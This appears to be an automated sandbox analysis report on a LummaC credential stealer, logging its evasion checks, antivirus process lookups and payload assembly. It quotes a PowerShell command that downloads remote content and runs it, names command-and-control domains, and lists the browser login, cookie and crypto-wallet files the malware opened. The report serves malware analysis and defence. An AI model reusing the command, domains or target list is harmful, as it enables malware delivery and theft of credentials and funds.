WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4040			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2152			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

API coverage: 3.7 %

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com TID: 6548	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com TID: 6484	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3084	Thread sleep count: 4040 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3084	Thread sleep count: 2152 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5932	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1028	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_00DADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_00DBA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_00DBA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	12_2_00DAE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	12_2_00DBA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DB66DC FindFirstFileW,FindNextFileW,FindClose,	12_2_00DB66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D7C622 FindFirstFileExW,	12_2_00D7C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_00DB73D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DB7333 FindFirstFileW,FindClose,	12_2_00DB7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_00DAD921

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D45FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

12_2_00D45FC8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Fires.com, 0000000C.00000002.2222110347.00000000017FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: powershell.exe, 00000011.00000002.2235769377.0000000007328000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DBF4FF BlockInput,

12_2_00DBF4FF

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D4338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

12_2_00D4338B

Source: C:\Users\user\Desktop\'Set-up.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D65058 mov eax, dword ptr fs:[00000030h]

12_2_00D65058

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DA20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

12_2_00DA20AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D72992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00D72992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D60BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00D60BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D60D45 SetUnhandledExceptionFilter,	12_2_00D60D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D60F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00D60F91

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Fires.com, 0000000C.00000002.2223295221.0000000004810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: beattalkerz.cyou

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

12_2_00DA1B4D

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D4338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

12_2_00D4338B

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DABBED SendInput,keybd_event,

12_2_00DABBED

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DAECD0 mouse_event,

12_2_00DAECD0

Source: C:\Users\user\Desktop\'Set-up.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Breasts Breasts.cmd & Breasts.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 221480	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Premium	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SIGNIFICANT" Collective	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 221480\Fires.com + Sk + Sb + Entire + Descriptions + Thats + Educators + Believe + Childrens + Pioneer + Retrieved 221480\Fires.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Poster + ..\Debate + ..\Scheduling + ..\Fascinating + ..\Groove + ..\Stories + ..\Mailman F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com Fires.com F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DA14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

12_2_00DA14AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DA1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

12_2_00DA1FB0

Source: Fires.com, 0000000C.00000000.1715292064.0000000000E03000.00000002.00000001.01000000.00000007.sdmp, Fires.com, 0000000C.00000003.2112044034.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, Pioneer.8.dr, Fires.com.1.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Fires.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D60A08 cpuid

12_2_00D60A08

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D9E5F4 GetLocalTime,

12_2_00D9E5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D9E652 GetUserNameW,

12_2_00D9E652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D7BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

12_2_00D7BCD2

Source: C:\Users\user\Desktop\'Set-up.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Fires.com, 0000000C.00000002.2222110347.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, Fires.com, 0000000C.00000002.2222028659.0000000001647000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ]llets/Electrum-LTC
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ets/ElectronCash
Source: Fires.com, 0000000C.00000002.2223065322.0000000004784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: oapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjoj
Source: Fires.com, 0000000C.00000002.2222110347.00000000017FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Fires.com, 0000000C.00000002.2222110347.0000000001816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Fires.com, 0000000C.00000002.2223065322.0000000004710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
